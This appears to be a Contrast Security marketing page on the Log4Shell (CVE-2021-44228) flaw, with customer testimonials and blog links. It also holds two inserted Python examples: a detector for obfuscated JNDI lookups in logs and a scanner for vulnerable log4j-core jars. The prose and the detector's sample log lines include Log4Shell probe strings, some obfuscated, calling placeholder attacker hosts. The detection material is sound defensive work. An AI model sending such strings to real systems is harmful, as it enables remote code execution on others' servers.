LOG4J

WHAT IS LOG4J

Log4j is a programming library (i.e. pre-written code) that appears in millions of computer applications globally. It is free, open source, and has been widely used since 2001.

Applications use Log4j to write short amounts of information into files/databases for “logging” purposes.

What happened? 

On Dec 9th, 2021, a critical vulnerability in Log4j 2 (CVE-2021-44228, since nicknamed Log4Shell) was publicly disclosed. If an attacker can get a specially crafted string such as ${jndi:ldap://attacker-host/a} (attacker-host being a placeholder) written to a log, for example by putting it in a username or a User-Agent header, Log4j’s lookup feature connects to the attacker’s server and loads code from it, letting the attacker read data from or take remote control of the machine.

Attackers began mass-exploiting the flaw within hours, and services run by large enterprises (Apple, Amazon, Twitter, Baidu, etc.) and government systems were shown to be affected. The extent of the impact globally is still unfolding.

Why does it matter to me? 

Any exposed system can be exploited by a remote attacker with a single crafted request; no credentials or special tooling are needed, and because Java runs on roughly 3 billion devices, the population of potentially exposed systems is enormous. A patch has been released, but most organizations can’t find every copy of Log4j in their applications, including copies bundled inside other libraries and packaged archives, so completing the patch across all systems is labor-intensive and will take a long time. This incident is worse than the 2017 Equifax breach, which came from a similar Java library vulnerability and cost that company $425M+ in settlement payments.
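Exploitation of CVE-2021-44228 starts with an attacker getting a ${jndi:...} lookup into something the application logs, and in practice the payload is disguised with nested lookups, case changes and URL encoding so that a naive grep for "jndi" misses it. The following is an added example, not code from this page or from Contrast Security. It emulates the small subset of Log4j 2 lookup syntax that attackers use to hide the payload (innermost-first expansion, ${lower:..}/${upper:..}, and the ':-' default-value form), URL-decodes the line first, and reports any JNDI lookup that is left once expansion is done. The access-log lines are constructed and attacker.example is a placeholder host.

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in log lines or HTTP headers.

Added example, not Contrast Security code. It emulates the subset of Log4j 2
lookup syntax attackers use to disguise ${jndi:...} (nested lookups,
${lower:..}/${upper:..} and the ':-' default-value form), then reports any
JNDI lookup left after expansion. All sample input below is constructed.
"""
import re
from urllib.parse import unquote

# A ${...} whose body contains no brace: the innermost lookup, expanded first,
# the same order Log4j's substitutor uses.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
MAX_ROUNDS = 50                      # bound the expansion loop on hostile input


def _resolve(name, found):
    """Emulate one lookup: return its value, or None if Log4j would treat it
    as unset (so a ':-default' applies)."""
    low = name.lower()
    if low.startswith("jndi:"):
        found.append(name)           # the dangerous lookup, in any letter case
        return "\x00JNDI\x00"        # sentinel that cannot be re-expanded
    if low.startswith("lower:"):
        return name[6:].lower()
    if low.startswith("upper:"):
        return name[6:].upper()
    return None                      # env:, sys:, date:, unknown: assume unset


def _expand_one(match, found):
    body = match.group(1)
    if ":-" in body:                 # ${name:-default}, e.g. ${env:NaN:-j} -> j
        name, default = body.split(":-", 1)
        value = _resolve(name, found)
        return default if value is None else value
    value = _resolve(body, found)
    # Log4j leaves an unresolvable ${...} in place; replace it with a marker so
    # the loop terminates instead of matching it again.
    return "\x00%s\x00" % body if value is None else value


def resolve_lookups(text):
    """Return (expanded_text, list of jndi lookups found) for one log line."""
    found = []
    text = unquote(text)             # %24%7B... is a common way to hide ${
    for _ in range(MAX_ROUNDS):
        new = INNERMOST.sub(lambda m: _expand_one(m, found), text)
        if new == text:
            break
        text = new
    return text, found


def is_log4shell_probe(line):
    return bool(resolve_lookups(line)[1])


# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%7D HTTP/1.1" 200 "-"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]


def scan(lines):
    """Return (line_number, lookup) for every JNDI lookup found in a log."""
    hits = []
    for n, line in enumerate(lines, 1):
        hits.extend((n, lookup) for lookup in resolve_lookups(line)[1])
    return hits


if __name__ == "__main__":
    for n, lookup in scan(SAMPLE_LINES):
        print("line %d: %s" % (n, lookup))
```

Lines 2 to 5 of the sample are all reported as the same underlying lookup while line 6, a harmless ${date:...} pattern, is not. The emulation is deliberately conservative: any lookup it does not understand (env:, sys:, and so on) is treated as unset so that the ':-default' branch is taken, which is what an attacker relies on when using ${env:NaN:-j}.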

“Before Contrast, we were using different static application security testing (SAST), software composition analysis (SCA), and WAF solutions. We found ourselves overwhelmed with tool soup. Contrast consolidated everything into a single platform with accurate and fast results that we were not aware of before. The ability to offer interactive application security testing (IAST) and runtime application self-protection (RASP) in a single agent was a major selling point for us. The platform features were more mature than their competition and made it easier to manage, integrate and consume results. We were also impressed with the seamless onboarding process. As an example, Contrast is protecting us against the recently disclosed Log4j vulnerability without having to patch or update our servers.”

Brian Vlootman, CISO
BACKBASE

Just received the official notification that Contrast is protecting against this. GREAT WORK! This highlights a really big win and has direct resource impacts for folks internally using it. They actually get to have the weekend off vs. other teams scrambling to fix.

Distinguished Advisor
Medical Device Manufacturer

We were able to analyze whether our own built software would be vulnerable to the Log4j zero-day, using the Contrast Secure Code Platform, and got the answer within 30 seconds by just looking at the Libraries menu! How fast is that!

Sandor Incze, CISO
CM.com

Contrast provided useful reporting on the log4j CVE for apps onboarded to Contrast. We also used information from your blog. After this week I can categorically say there is a LOT more interest in Contrast.

Paul Lewis, BISO
Elsevier
CONTRAST VS THE LOG4J2 CVE - A DEMONSTRATION

Contrast Security co-founder Jeff Williams demos the Contrast Secure Code Platform, finds the vulnerability that caused CVE-2021-44228, and stops attacks against it, without updating versions or using a WAF.

WATCH NOW

DEMO
Contrast Security experts weigh in on the recent LOG4J2 exploit.

Hear from Contrast Security’s Director of Developer Relations, Erik Costlow, on what can be done to mitigate the zero-day now, the recommended approaches, and how you can prevent exploitation right away.

LEARN MORE

JAVA LOG4J2
The Contrast Secure Code Platform is explicitly engineered for security events like the current, ongoing Log4j remote code execution vulnerability.

Contrast Protect can block attacks on the Log4j vulnerability today, in your production systems, without requiring software upgrades.

Contrast Assess and Contrast SCA enable development teams to find the vulnerability in applications before they’re released to production.

Additional Resources

Preparing for the Next Zero-Day Vulnerability

Live Webinar - January 26th at 9am PST

Join Larry Maccherone, DevSecOps Transformation lead at Contrast Security, and Farshad Abasi, Chief Security Officer at Forward Security, for an interactive discussion about how to prepare for emerging threats so your organization can respond instantly to zero-day vulnerabilities like Log4Shell.

REGISTER NOW
[UPGRADE TO 2.17] UPDATED GUIDANCE ON ADDRESSING LOG4J CVES

This morning, the Apache Software Foundation released another Log4j update (version 2.17.0) to address a new CVE, CVE-2021-45105. Contrast recommends upgrading to this version.

Learn More
EXPRESSION LANGUAGE AND DESERIALIZATION ATTACKS ON THE RISE IN LEAD-UP TO LOG4J VULNERABILITY

It’s been a couple of weeks since the first public disclosure of the Log4j vulnerability. A lot has happened - perhaps the understatement of the year. Several rounds of new patches have been issued by the Apache Software Foundation and others as new information about this unprecedented security issue is discovered. We’re now learning about some of the more sinister aspects of this situation, with nation-state actors exploiting the vulnerability.

READ BLOG
THREE REASONS WHY CONTRAST SCA IS BEST SUITED FOR LOG4SHELL RAPID RESPONSE

Tools that present a deluge of irrelevant findings lead security teams to chase their developers to patch libraries that aren’t actually used by their application. In short, in a zero-day incident response scenario, SCA tools need to let teams easily identify the applications at risk, confirm which of them are actually vulnerable, and quickly put some form of protection in place. Enter Contrast and its cross-platform approach to Software Composition Analysis.

READ BLOG
CONTRAST SECURITY PROTECTS SERVERLESS APPLICATIONS FROM LOG4J ATTACKS

As I write this blog, and at this very moment as you’re reading it, hackers are making tens of thousands of attempts to exploit this critical security vulnerability in the Java logging library Apache Log4j. If your organization uses Java, there is a good chance it’s exposed to this vulnerability. Don’t stay idle waiting for something to go wrong; make sure your serverless application is secure.

READ BLOG
LOG4J ON-DEMAND WEBINAR

ON-DEMAND RECORDING AVAILABLE

The most serious of vulnerabilities was just found in the most widely used logging framework, but DevSecOps teams can quickly identify what’s impacted and where to focus their time.

WATCH NOW
LOG4SHELL BY THE NUMBERS

We monitor many thousands of applications with Contrast Assess (IAST), Contrast SCA, and Contrast Protect (RASP), so we have a data set unlike anyone else’s, and so far it yields some really interesting takeaways.

Learn More
UPDATED GUIDANCE ON ADDRESSING LOG4J CVES

The Apache Software Foundation has provided updated guidance that the first patch for Log4Shell (version 2.15.0) was insufficient, so version 2.15.0 and below remain affected; a new update (version 2.16.0) fixes these issues.

Learn More
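The two guidance notes above (2.16.0 for Log4Shell, 2.17.0 for CVE-2021-45105) only help once you know which Log4j versions are actually deployed, and the hard part is the copies hidden inside WARs and fat jars. The following is an added example, not Contrast Security’s tooling: it walks a directory, opens each archive, descends into nested .jar/.war entries, reads log4j-core’s pom.properties for the version, checks whether JndiLookup.class is still present, and classifies the result against the version thresholds on this page. The application jar it scans is constructed in a temporary directory with stub entries; the BOOT-INF/lib layout is the one Spring Boot uses, and the classification helper treats the Java 6/7 back-port branches (2.3.x, 2.12.x) as out of scope.

```python
"""Find Log4j 2 copies inside jars, including jars nested in WARs and fat jars,
and classify each by version against the upgrade guidance on this page.

Added example, not Contrast Security's tooling. The archive it scans is
constructed in a temp directory with stub entries (no real bytecode).
"""
import io
import os
import re
import tempfile
import zipfile

# Where Maven-built log4j-core jars record their version, and the class whose
# presence means JNDI lookups are still wired in.
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"^version=(\S+)", re.M)
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9) (qualifiers ignored)."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])


def classify(version, has_jndi_lookup):
    """Status per this page's guidance: 2.16.0 fully fixes Log4Shell, 2.17.0
    also fixes CVE-2021-45105. Caveat: the Java 7 and Java 6 back-port
    branches (2.12.x, 2.3.x) have their own fixed releases and would be
    mis-reported here; treat any hit on those branches as 'review by hand'."""
    v = parse_version(version)
    if v >= (2, 17, 0):
        return "ok: at or above 2.17.0"
    if v >= (2, 16, 0):
        return "upgrade: 2.16.x, CVE-2021-45105 unfixed; move to 2.17.0"
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed, but still upgrade to 2.17.0"
    return "VULNERABLE: Log4Shell, upgrade to 2.17.0"


def scan_jar(data, path):
    """Yield (path, version, status) for every log4j-core found in an archive,
    descending into nested archives (Spring Boot fat jars, WARs, EARs)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM in names:
            m = VERSION_RE.search(zf.read(POM).decode("utf-8", "replace"))
            version = m.group(1) if m else "unknown"
            yield path, version, classify(version, JNDI_LOOKUP in names)
        for name in sorted(names):
            if name.endswith(ARCHIVE_EXT):
                try:
                    yield from scan_jar(zf.read(name), path + "!/" + name)
                except zipfile.BadZipFile:
                    pass             # entry named like an archive but is not one


def scan_directory(root):
    """Walk a deployment directory and scan every archive under it."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    results.extend(scan_jar(fh.read(), full))
    return results


def build_sample_fat_jar(path):
    """Constructed sample: an application jar embedding log4j-core 2.14.1
    under BOOT-INF/lib, the layout Spring Boot uses."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM, "groupId=org.apache.logging.log4j\n"
                        "artifactId=log4j-core\nversion=2.14.1\n")
        z.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # stub, not real bytecode
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
        z.writestr("BOOT-INF/classes/app/Main.class", b"\xca\xfe\xba\xbe")


def demo():
    """Build the sample jar in a temp dir and return the scan results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_fat_jar(os.path.join(tmp, "app.jar"))
        return scan_directory(tmp)


if __name__ == "__main__":
    for path, version, status in demo():
        print(path, version, status)
```

Point scan_directory at a real deployment root to use it. A hit reported with version "unknown" has a log4j-core pom.properties without a version line and should be inspected by hand, and a copy of Log4j that a vendor has shaded into another artifact under a different Maven path will not be found by the pom.properties check at all, which is exactly the class of hidden copy that makes a complete inventory hard.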
INSTANTLY INOCULATE YOUR SERVERS AGAINST LOG4J WITH NEW OPEN SOURCE TOOL
Learn More
WAF, RASP AND LOG4SHELL

Log4Shell has done an excellent job of making the case for Runtime Application Self-Protection (RASP). Here’s the quick summary: our Contrast Protect customers have been secure against the remote code execution (RCE) in this vulnerability for..

Read More
THE LOG4J VULNERABILITY IS BAD. HERE’S THE GOOD NEWS

Contrast News By: VentureBeat, Dec 13, 2021 6:18:47 PM

A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon.

Learn More
Contrast Security Protects Global Enterprises and Fortune 500 Customers from Log4j Attacks

Press Release - Dec. 17 2021

The Contrast platform secures the world’s largest organizations against attacks on applications that use Log4j, without patching, while also protecting against future vulnerabilities.

Learn More

Leverage the Contrast Secure Code Platform and service offerings to stop attacks at runtime with Contrast Protect at no charge for a limited time.